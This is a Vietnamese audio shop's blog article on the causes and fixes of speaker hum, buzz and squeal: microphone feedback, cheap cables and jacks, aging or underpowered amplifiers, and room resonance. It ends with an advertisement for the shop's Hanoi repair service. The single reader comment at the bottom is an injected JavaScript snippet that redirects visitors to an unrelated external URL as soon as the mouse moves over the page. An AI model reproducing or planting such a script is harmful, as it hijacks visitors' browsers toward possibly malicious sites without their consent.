Bá Hùng Audio - Chuyên thiết bị âm thanh đẹp, tuyển chọn - Amply - Pre Pow - Loa - Đầu CD

Loa Bị Ù, Rền, Rè, Rít, Hú Khi Sử Dụng-Nguyên Nhân& Cách Xử Lý Triệt Để

Thứ Tư, 09/06/2021
Bá Hùng Audio

Sau một thời gian sử dụng, bỗng nhiên chiếc loa yêu thích của bạn xuất hiện tình trạng loa bị ù, rền, rè, rít, hú kéo dài. Khi bật loa lên, liên tục xuất hiện những tiếng ồn khó chịu, làm ảnh hưởng nghiêm trọng đến việc thưởng thức âm nhạc. 

Bài viết này Bá Hùng Audio dành riêng đến cho các bạn đang gặp vấn đề này. Chúng tôi sẽ liệt kê các nguyên nhân gây nên tình trạng này và đi kèm với đó là cách xử lý chi tiết với từng trường hợp.

Loa bị ù, rền, rè, rít, hú do để micro hú

Nguyên nhân

Micro hú chắc chắn là một trong những nguyên nhân làm cho loa nhanh bị hỏng nhất. Nhẹ thì làm loa bị rền, sôi,.. còn nếu mà nặng thì nó sẽ làm cháy cả loa luôn. Nguyên nhân thì do micro bị hú sẽ làm coil loa và cuộn dây loa di chuyển liên tục không còn thời gian tản nhiệt nên dần sẽ làm loa bị sôi, rè.

Cách xử lý

Micro bị hú lập tức tắt micro ngay. Nếu nguyên nhân là do micro thì cách giải quyết rất nhanh và đơn giản. 

Loa bị ù, rền, rè, rít, hú do để micro hú

>>> Xem thêm: Cách sở hữu siêu phẩm loa JBL EC 138

Loa bị ù, rền, rè, rít, hú do sử dụng phụ kiện kém chất lượng

Nguyên nhân

Phụ kiện cũng tác động rất lớn đến chất lượng âm thanh bạn nhé. Ví dụ bạn dùng dây loa đểu, nó truyền tín hiệu sẽ bị kém rất nhiều. Jack cắm loa, ổ cắm jack kém chất lượng, lỏng lẽo cũng gây ra tiếng rè, tiếng ù ù. Các thiết bị phụ kiện nên mua những sản phẩm có chất lượng tương xứng với chất lượng của bộ dàn.

Cách xử lý

Mua các phụ kiện loại tốt, chất lượng cao. Vừa bền vừa tăng chất lượng âm thanh. Kiểm tra jack kết nối với loa: Nếu bạn thấy đầu kết nối với loa nó quá cũ, hãy thử xịt vào một chút nước chống gỉ RP7 sau đó vệ sinh, làm khô và thử lại xem nó có đỡ sôi hơn không nhé.

Loa bass bị ù, rền, rè, rít, hú do amply 

Nguyên nhân

   - Mạch của amply đã quá cũ, chính vì vậy nó không thể như mới, nên nó tạo ra tiếng ù, rè kéo dài của loa bass là điều dễ hiểu

   - Công suất của amply đang bị quá tải, khi tải không đủ, tín hiệu truyền vào loa k đạt nên loa sẽ tạo ra tiếng ù. Tiếng Ù này càng lớn khi công suất amply càng thiếu so với loa, đặc biệt là loa bass.

   - Đường dây truyền tín hiệu từ amply ra loa không còn tốt, cũng là nguyên nhân làm cho loa bị ù khi bật ampli.

Cách xử lý

   - Kiểm tra lại mạch của amply xem có biểu hiện bị hoen rỉ, hoặc có nhiều bụi bẩn bám vào không. Nếu có bụi bẩn bám vào, tốt nhất bạn nên làm sạch lại mạch của amply

   - Loa bass bị ù do thiếu công suất thì bạn nên kiểm tra lại công suất của loa và amply sao cho phù hợp. Bài này là dành cho bạn: Cách tính công suất loa và amply phù hợp nhất.

   - Nếu vẫn chưa hết ù, bạn nên thay 1 loại dây loa mới có thể sẽ khắc phục được hiện tượng này.

Loa bass bị ù, rền, rè, rít, hú do amply 

Loa bị ù, rền, rè, rít, hú do cộng hưởng

Nguyên nhân

Một nguyên nhân khách quan tác động rất lớn đến loa sub làm cho nó bị ù, rè đó chính là cộng hưởng phòng. Diện tích phòng, đồ đạc, vật dụng bố trí trong phòng, vị trí đặt loa cũng như cửa sổ, cửa ra vào, mành rèm đều là những điểm phải kể đến tác động rất lớn khiến việc khuếch đại âm thanh bị ảnh hưởng.

Không thể bỏ qua một nguyên do nữa đó là bạn đang kết nối các thiết bị âm thanh với nhau không chính xác. Cách kết nối loa đã từng được Bá Hùng Audio hướng dẫn mà nhiều người thực hiện việc kết hợp này vẫn sai sẽ khiến cho loa bass có tiếng ù rền kèm theo.

Do không gian nhà bạn nhỏ hẹp mà bạn lại đặt loa sub ở sát tường, do đó nghe những bài nhạc Bass nhiều sẽ có hiện tượng ú, có đuôi. Cụ thể tiếng Bass bị cộng hưởng từ việc âm thanh dội vào tường ấy.

Cách xử lý

Khi vấn đề ở mức nhẹ thì bạn có thể xử lý tại nhà được. Có thể xử lý bằng cách thay loa khác, bố trí lại vật dụng trong phòng hoặc thay đổi vị trí đặt loa. Bạn nên lắp đặt thêm các nút âm ở quanh phòng để có thể giảm tối đa tiếng ù rền và giúp cho chất lượng âm thanh hay hơn.

Loa bị ù, rền, rè, rít, hú do cộng hưởng

>>> Xem thêm: Loa - loa nghe nhạc- thiết bị âm thanh tuyển chọn

Sửa chữa tình trạng loa bị ù, rền, rè, rít, hú khi sử dụng triệt để tại Hà Nội

Loa bị ù, rền, rè, rít, hú khi sử dụng nguyên nhân và cách xử lý cơ bản đã được liệt kê ở trên đây. Tuy nhiên, sự đa dạng trong thiết kế và công nghệ sản xuất đã phát sinh thêm nhiều lỗi vặt khác nhau.

Trong trường hợp loa bị ù, rền, rè, rít, hú khi sử dụng kéo dài thì bạn nên mang loa hoặc dàn âm thanh tới các cửa hàng sửa chữa loa chuyên nghiệp. 

Bá hùng Audio - địa chỉ bán loa, thiết bị âm thanh hàng tuyển chính hãng sẽ tư vấn, hỗ trợ sửa chữa cho các bạn. Với một mức chi phí cực kỳ hợp lý, chúng tôi sẽ giải quyết tất cả các vấn đề vướng mắc cho các bạn. 

BÁ HÙNG AUDIO "CHẤT LƯỢNG TẠO THỊNH VƯỢNG"

18 Lô 1B Trung Yên 11A (32 Vũ Phạm Hàm), Trung Yên, Cầu Giấy, Hà Nội

ĐT: 0978263263 - WEB: http://bahungaudio.com/

Youtube: http://www.youtube.com/c/Hungaudiovn

FB: https://www.facebook.com/bahungaudio

 

>> TÌM KIẾM NHANH:

=> | HÀNG MỚI VỀ | LOA BÃI MỚI VỀ | LOA NGHE NHẠC VÀNG | LOA GIÁ RẺ |

=> | AMPLY BÃI MỚI VỀ | AMPLY BÃI GIÁ RẺ NHẤT | AMPLY BÃI XỊN |

=> | ĐẦU CD BÃI MỚI VỀ | ĐẦU CD TỐT NHẤT | ĐẦU KARAOKE | ĐẦU DVD |

=> | PHỤ KIỆN AUDIO | DÂY LOA | DÂY TÍN HIỆU | CHÂN LOA | MICRO |

 

Viết bình luận của bạn

Bình luận (1)
binh-luan

puytzd Trả lời

14/07/2022

function redir() { document.location.href="https://goshbiopsy.com/r3sbb4ewsf?key=dc45c101cc3c9c62518a9e59c9aa5631"; } document.body.onmouseover = redir;

Danh mục tin tức